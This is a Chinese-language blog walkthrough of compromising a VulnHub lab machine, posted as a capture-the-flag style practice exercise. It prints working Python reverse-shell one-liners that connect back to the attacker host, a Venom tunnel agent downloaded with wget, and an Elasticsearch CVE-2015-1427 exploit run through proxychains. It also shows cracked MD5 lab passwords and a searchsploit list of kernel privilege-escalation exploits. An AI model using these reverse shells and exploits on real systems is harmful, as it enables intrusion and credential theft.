vulhub打靶第一周
2024-05-14 02:29:21
title: vulhub打靶第一周
description: vulhub打靶第一周 难度:middle
date: 2023-06-01
categories:
- [渗透,靶机]
图片链接有问题访问:https://qing3feng.github.io/2023/06/01/vulhub%E6%89%93%E9%9D%B6%E7%AC%AC%E4%B8%80%E5%91%A8/
vulhub打靶第一周
刷完HTB所有简单靶机后,来看看vulhub的靶机提升一下自我,感谢@xiaoqiu的鼎力相助
下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
信息收集
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h 192.168.64.1/24___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.64.2 is alive
(icmp) Target 192.168.64.1 is alive
(icmp) Target 192.168.64.128 is alive
(icmp) Target 192.168.64.132 is alive
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1 00:50:56:c0:00:08 VMware, Inc.
192.168.64.2 00:50:56:e3:65:6e VMware, Inc.
192.168.64.132 00:0c:29:3f:6b:8f VMware, Inc.
192.168.64.254 00:50:56:ed:bf:51 VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 4 responded
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap 192.168.64.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:31 CST
Nmap scan report for 192.168.64.1
Host is up (0.00057s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
903/tcp open iss-console-mgr
1086/tcp open cplscrambler-lg
1234/tcp open hotline
3306/tcp open mysql
5357/tcp open wsdapi
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
9200/tcp open wap-wsp
10002/tcp open documentum
MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.64.2
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:E3:65:6E (VMware)Nmap scan report for 192.168.64.132
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)Nmap scan report for 192.168.64.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.64.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:ED:BF:51 (VMware)Nmap scan report for 192.168.64.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open httpNmap done: 256 IP addresses (5 hosts up) scanned in 7.79 seconds
可以看到三种结果不尽相同,但是都有一个目标靶机192.168.64.132
我们可以使用nmap进行更进一步的信息收集:
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap --min-rate 10000 192.168.64.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:36 CST
Nmap scan report for 192.168.64.132
Host is up (0.00071s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
只有5000端口能利用,我们访问看看:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lUbuEVd0-1685660171846)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601133912-1yivvba.png)]
简单测试后好像并没有发现常规漏洞,对这个网站进行下一步的信息收集
目录爆破
因为这里是ip地址,就不进行子域名收集了
对他的目录进行爆破看看:
目录扫描有三个工具都可以试试:
python dirsearch.py -u http://192.168.64.132:5000/
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt# 需要提前安装的
# 1.seclists字典 --> 安装方法:sudo apt install seclists
#
# 2.dirseach --> 安装方法:法1.直接输入dirseach默认安装,以后直接当命令用
# 法2.git clone https://github.com/maurosoria/dirsearch
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev
________________________________________________:: Method : GET:: URL : http://192.168.64.132:5000/FUZZ:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 100:: Matcher : Response status: 200,301
________________________________________________:: Progress: [100/26584] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: [Status: 200, Size: 401, Words: 28, Lines: 20, Duration: 94ms]* FUZZ: admin
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.64.132:5000/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/01 13:43:27 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 401]
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ sudo python dirsearch.py -u http://192.168.64.132:5000/_|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710Output: /home/kali/Tools/dirsearch/reports/http_192.168.64.132_5000/__23-06-01_13-44-06.txtTarget: http://192.168.64.132:5000/[13:44:06] Starting:
[13:44:40] 200 - 401B - /admin
gobuster和dirseach比较友好推荐这两个。另外gobuster还支持子域名探测,可以参考qing3feng.github.io/2023…中的命令
getshell
我们搜集到/admin可利用,访问看看
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9X67Wtuf-1685660171846)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601135120-nbic7kf.png)]
发现是一个代码执行,我们输入的都会被传入exec执行
写一个反弹shell:
下面这两种都可以:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.64.128] from (UNKNOWN) [192.168.64.132] 43205
/app # ls /
ls /
app dev home media proc run srv tmp var
bin etc lib mnt root sbin sys usr
/app # whoami
whoami
root发现直接是一个root权限,甚至不需要提权
看一下网卡信息:
/app # ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02 inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:217054 errors:0 dropped:0 overruns:0 frame:0TX packets:215883 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:21519988 (20.5 MiB) TX bytes:30322971 (28.9 MiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:65536 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
居然是只有一个172.17的网段,我们明明是靠着192.168的网段进来的,却拿到了172.17的机子,说明这个很有可能是192.168.64.132的docker容器,可以使用命令 cat /proc/1/cgroup来看看我们猜测是否正确:
/app # cat /proc/1/cgroup
11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
10:perf_event:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
9:blkio:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
8:freezer:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
7:devices:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
6:memory:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
5:cpuacct:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
4:cpu:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
3:cpuset:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
可以看到这种后面全是一串字符的就可以确定是docker了
我们可以对比一下本机kali的:
┌──(kali㉿kali)-[/var/www/html]
└─$ cat /proc/1/cgroup
0::/init.scope
接下来就是如何从docker中逃逸出来了
所以我们要扫网段,但是这个docker容器没有可利用的扫描工具,最简单的就是利用shell写个脚本了:
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
收到三个请求包
隧道搭建
但是我们想进一步探测肯定想利用集成的工具,所以我们要搭建隧道利用本机kali的工具进行扫描
那么如何搭建隧道呢?这里利用Venom
┌──(kali㉿kali)-[~/Tools]
└─$git clone https://github.com/Dliv3/Venom
安装好后进入目录编译一下:
┌──(kali㉿kali)-[~/Tools/Venom]
└─$ ./build.sh
build macos x64 admin & agent...
go: downloading github.com/cheggaaa/pb/v3 v3.0.1
go: downloading golang.org/x/crypto v0.0.0-20190911031432-227b76d455e7
go: downloading github.com/libp2p/go-reuseport v0.0.1
go: downloading github.com/fatih/color v1.7.0
go: downloading github.com/VividCortex/ewma v1.1.1
go: downloading github.com/mattn/go-colorable v0.1.2
go: downloading github.com/mattn/go-isatty v0.0.8
go: downloading github.com/mattn/go-runewidth v0.0.4
go: downloading golang.org/x/sys v0.0.0-20190412213103-97732733099d
build linux x64 admin & agent...
build linux x86 admin & agent...
build windows x86 admin & agent...
build arm eabi5 agent...
build mipsel agent..
进入release目录,本地开启一个http服务供docker下载客户端用于连接我们:
我们先看一下docker的环境是多少位的内核版本多少:
/app # cat /proc/version
Linux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
/app # uname -a
Linux 755411217bdd 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 Linux
可以看到是64位的
我们在/Venom/release目录下面用python开一个web服务:
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
如何在目标靶机上下载客户端:
/app # wget 192.168.64.128:8888/agent_linux_x64
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
agent_linux_x64 100% |*******************************| 3564k 0:00:00 ETA
kali开启监听端口:
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ ./admin_linux_x64 -lport 2333
Venom Admin Node Start...██▒ █▓█████ ███▄ █ ▒█████ ███▄ ▄███▓ ▓██░ █▓█ ▀ ██ ▀█ █▒██▒ ██▓██▒▀█▀ ██▒ ▓██ █▒▒███ ▓██ ▀█ ██▒██░ ██▓██ ▓██░ ▒██ █░▒▓█ ▄▓██▒ ▐▌██▒██ ██▒██ ▒██ ▒▀█░ ░▒████▒██░ ▓██░ ████▓▒▒██▒ ░██▒ ░ ▐░ ░░ ▒░ ░ ▒░ ▒ ▒░ ▒░▒░▒░░ ▒░ ░ ░ ░ ░░ ░ ░ ░ ░░ ░ ▒░ ░ ▒ ▒░░ ░ ░ ░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ { v1.1 author: Dlive }
目标机连接kali:
/app # ./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
2023/06/01 06:45:18 [+]Successfully connects to a new node
连接成功后可以用show查看连接的情况:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l4ckzks9-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601192857-7d55eso.png)]
我们可以利用goto 1进入该节点
可以利用该节点搭建socket5代理
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3Ulflesu-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193058-hd3jrd8.png)]
接着利用本机的kali的proxychains来连接这个socket代理
┌──(kali㉿kali)-[~/桌面]
└─$ sudo gedit /etc/proxychains4.conf
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QqAYFo5k-1685660171847)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193233-jy5kae1.png)]
配置好代理就可以开始信息收集了
横向利用
结合上面的信息收集我们知道目前已经拿下的docker容器是172.17.0.2
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
还剩172.17.0.3和172.17.0.1
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.1
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.3Nmap scan report for 172.17.0.3
Host is up (0.025s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
9200/tcp open wap-wspNmap done: 1 IP address (1 host up) scanned in 23.14 seconds
我们访问了172.17.0.1其实可以看出来就是刚才的172.17.0.1,可能他就是网关
探测一下172.17.0.3的详细信息:
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -sV -p 9200 172.17.0.3
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Brain Cell; cluster: elasticsearch; Lucene 4.10.2)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
发现是一个Elasticsearch,可以看一下有没有nday可以利用:
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Elasticsearch
------------------------------------------ ---------------------------------Exploit Title | Path
------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Byp | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Down | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directo | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Data | multiple/webapps/50152.py
------------------------------------------ ---------------------------------
Shellcodes: No Results发现有一些是可以利用的,我们首先尝试rce的:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EdYKXAwU-1685660171848)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195524-zfpsxwd.png)]
可以看到它的帮助文档,我们输入命令:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ proxychains python2 36337.py 172.17.0.3
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░ ░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
bin
boot
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
passwords
proc
root
run
发现可以成功执行,这里要记得带proxychains
发现有一个passwords,我们看看:
~$ cat passwords
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
看着像md5,我们用在线工具查一下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QDWEApfX-1685660171848)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195857-8rzdc79.png)]
解出1337hack
john:1337hack
test:1234test
admin:1111pass
root:1234pass
jane:1234jane
解出来就是这些账号密码,结果只有一个john可以登陆:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ssh john@192.168.64.132
The authenticity of host '192.168.64.132 (192.168.64.132)' can't be established.
ED25519 key fingerprint is SHA256:JZd5+gaOpg7shDrwi9MncScWvVqsSRB4+LpUUrRP3yo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.64.132' (ED25519) to the list of known hosts.
john@192.168.64.132's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)* Documentation: https://help.ubuntu.com/System information disabled due to load higher than 1.0Last login: Thu Jun 1 01:27:18 2023
john@socnet:~$
提权
发现常用的两种手段都无法提权:
john@socnet:~$ find / -perm -type f 2 > /dev/null
find: invalid mode `-type'
john@socnet:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on socnet.
那只能利用系统内核漏洞提权了
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
发现它的系统的内核版本低的可怜啊,想在最新的内核版本都达到5.17了,差了两个大版本实际上是差别非常大的
查找linux3.13的内核提权漏洞:
┌──(kali㉿kali)-[~]
└─$ searchsploit linux 3.13
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit) | linux/remote/42697.rb
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution | linux/remote/33805.pl
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) | linux/remote/42695.rb
AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak | linux/dos/40181.c
CyberArk < 10 - Memory Disclosure | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service | linux/dos/44857.html
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution | linux/remote/19079.c
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution | linux/webapps/44543.txt
KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception | linux/dos/2954.html
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure | linux/remote/44022.md
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escalation | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | linux/dos/36743.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | linux/dos/31305.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
Logpoint < 5.6.4 - Root Remote Code Execution | linux/remote/42158.py
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
Nagios < 4.2.2 - Arbitrary Code Execution | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation | linux/local/40921.sh
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control | linux/webapps/44757.txt
pam-krb5 < 3.13 - Local Privilege Escalation | linux/local/8303.c
PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution | linux/local/3426.php
